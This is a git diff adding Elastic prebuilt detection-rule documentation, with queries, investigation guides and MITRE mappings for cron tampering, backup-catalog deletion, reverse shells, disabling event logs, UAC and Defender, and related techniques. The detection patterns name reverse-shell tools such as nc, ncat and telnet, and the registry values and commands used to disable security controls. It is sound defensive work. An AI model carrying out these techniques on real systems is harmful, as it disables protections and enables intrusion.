Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type : "linux" and event.action : ("change" or "file_modify_event" or "creation" or "file_create_event") and +file.path : (/etc/cron.allow or /etc/cron.deny or /etc/cron.d/* or /etc/cron.hourly/* or /etc/cron.daily/* or +/etc/cron.weekly/* or /etc/cron.monthly/* or /etc/crontab or /usr/sbin/cron or /usr/sbin/anacron) +and not (process.name : ("dpkg" or "dockerd" or "rpm" or "snapd" or "yum" or "exe" or "dnf" or "5") or +file.extension : ("swp" or "swpx")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin.asciidoc new file mode 100644 index 0000000000..f63452fe29 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin.asciidoc @@ -0,0 +1,115 @@ +[[prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin]] +=== Deleting Backup Catalogs with Wbadmin + +Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Deleting Backup Catalogs with Wbadmin + +Windows Server Backup stores the details about your backups (what volumes are backed up and where the backups are located) in a file called a backup catalog, which ransomware victims can use to recover corrupted backup files. Deleting these files is a common step in threat actor playbooks. + +This rule identifies the deletion of the backup catalog using the `wbadmin.exe` utility. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Check if any files on the host machine have been encrypted. + +### False positive analysis + +- Administrators can use this command to delete corrupted catalogs, but overall the activity is unlikely to be legitimate. + +### Related rules + +- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9 +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 +- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities. +- If any backups were affected: + - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "wbadmin.exe" or process.pe.original_file_name == "WBADMIN.EXE") and + process.args : "catalog" and process.args : "delete" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Inhibit System Recovery +** ID: T1490 +** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc new file mode 100644 index 0000000000..26d2007580 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc @@ -0,0 +1,95 @@ +[[prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process]] +=== Deprecated - Potential Reverse Shell via Suspicious Parent Process + +This detection rule detects the creation of a shell through a suspicious parent child relationship. Any reverse shells spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +This rule was deprecated due to its addition to the umbrella `Potential Reverse Shell via Suspicious Child Process` (76e4d92b-61c1-4a95-ab61-5fd94179a1ee) rule. +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id with maxspan=1s +[ process where host.os.type == "linux" and event.type == "start" and event.action == "fork" and ( + (process.name : "python*" and process.args == "-c" and not process.args == "/usr/bin/supervisord") or + (process.name : "php*" and process.args == "-r") or + (process.name : "perl" and process.args == "-e") or + (process.name : "ruby" and process.args in ("-e", "-rsocket")) or + (process.name : "lua*" and process.args == "-e") or + (process.name : "openssl" and process.args : "-connect") or + (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3 and not process.args == "-z") or + (process.name : "telnet" and process.args_count >= 3) or + (process.name : "awk")) and + process.parent.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") ] +[ network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools.asciidoc new file mode 100644 index 0000000000..f79186ef9b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools]] +=== Disable Windows Event and Security Logs Using Built-in Tools + +Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/logman +* https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic +* Ivan Ninichuck +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Disable Windows Event and Security Logs Using Built-in Tools + +Windows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response. + +This rule looks for the usage of different utilities to disable the EventLog service or specific event logs. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. + - Verify if any other anti-forensics behaviors were observed. +- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Re-enable affected logging components, services, and security monitoring. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and +( + ((process.name:"logman.exe" or process.pe.original_file_name == "Logman.exe") and + process.args : "EventLog-*" and process.args : ("stop", "delete")) or + + ((process.name : ("pwsh.exe", "powershell.exe", "powershell_ise.exe") or process.pe.original_file_name in + ("pwsh.exe", "powershell.exe", "powershell_ise.exe")) and + process.args : "Set-Service" and process.args: "EventLog" and process.args : "Disabled") or + + ((process.name:"auditpol.exe" or process.pe.original_file_name == "AUDITPOL.EXE") and process.args : "/success:disable") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Clear Windows Event Logs +** ID: T1070.001 +** Reference URL: https://attack.mitre.org/techniques/T1070/001/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable Windows Event Logging +** ID: T1562.002 +** Reference URL: https://attack.mitre.org/techniques/T1562/002/ +* Sub-technique: +** Name: Indicator Blocking +** ID: T1562.006 +** Reference URL: https://attack.mitre.org/techniques/T1562/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification.asciidoc new file mode 100644 index 0000000000..6511040595 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification.asciidoc @@ -0,0 +1,159 @@ +[[prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification]] +=== Disabling User Account Control via Registry Modification + +User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.greyhathacker.net/?p=796 +* https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings +* https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-overview + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Disabling User Account Control via Registry Modification + +Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted. + +For more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works). + +Attackers may disable UAC to execute code directly in high integrity. This rule identifies registry value changes to bypass the UAC protection. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behaviors in the alert timeframe. +- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Analyze non-system processes executed with high integrity after UAC was disabled for unknown or suspicious processes. +- Retrieve the suspicious processes' executables and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled tasks creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Restore UAC settings to the desired state. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type == "change" and + registry.path : + ( + "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA", + "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin", + "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop" + ) and + registry.data.strings : ("0", "0x00000000") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell.asciidoc new file mode 100644 index 0000000000..9a78bae996 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell]] +=== Disabling Windows Defender Security Settings via PowerShell + +Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2019-ps + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Disabling Windows Defender Security Settings via PowerShell + +Microsoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks. + +This rule monitors the execution of commands that can tamper the Windows Defender antivirus features. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the command line to determine which action was executed. Based on that, examine exceptions, antivirus state, sample submission, etc. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed. + +### Related rules + +- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb +- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Based on the command line, take actions to restore the appropriate Windows Defender antivirus configurations. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name in ("powershell.exe", "pwsh.dll", "powershell_ise.exe")) and + process.args : "Set-MpPreference" and process.args : ("-Disable*", "Disabled", "NeverSend", "-Exclusion*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry.asciidoc new file mode 100644 index 0000000000..28903385d7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry.asciidoc @@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry]] +=== DNS-over-HTTPS Enabled via Registry + +Identifies when a user enables DNS-over-HTTPS. This can be used to hide internet activity or the process of exfiltrating data. With this enabled, an organization will lose visibility into data such as query type, response, and originating IP, which are used to determine bad actors. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html +* https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and + (registry.path : "*\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled" and + registry.data.strings : "1") or + (registry.path : "*\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode" and + registry.data.strings : "secure") or + (registry.path : "*\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS" and + registry.data.strings : "1") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dynamic-linker-copy.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dynamic-linker-copy.asciidoc new file mode 100644 index 0000000000..54f61bb7a8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dynamic-linker-copy.asciidoc @@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-dynamic-linker-copy]] +=== Dynamic Linker Copy + +Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Threat: Orbit +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=1m +[process where host.os.type == "linux" and event.type == "start" and process.name : ("cp", "rsync") and + process.args : ("/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2", "/etc/ld.so.preload")] +[file where host.os.type == "linux" and event.action == "creation" and file.extension == "so"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z.asciidoc new file mode 100644 index 0000000000..22f0af9588 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z.asciidoc @@ -0,0 +1,124 @@ +[[prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z]] +=== Encrypting Files with WinRar or 7z + +Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also 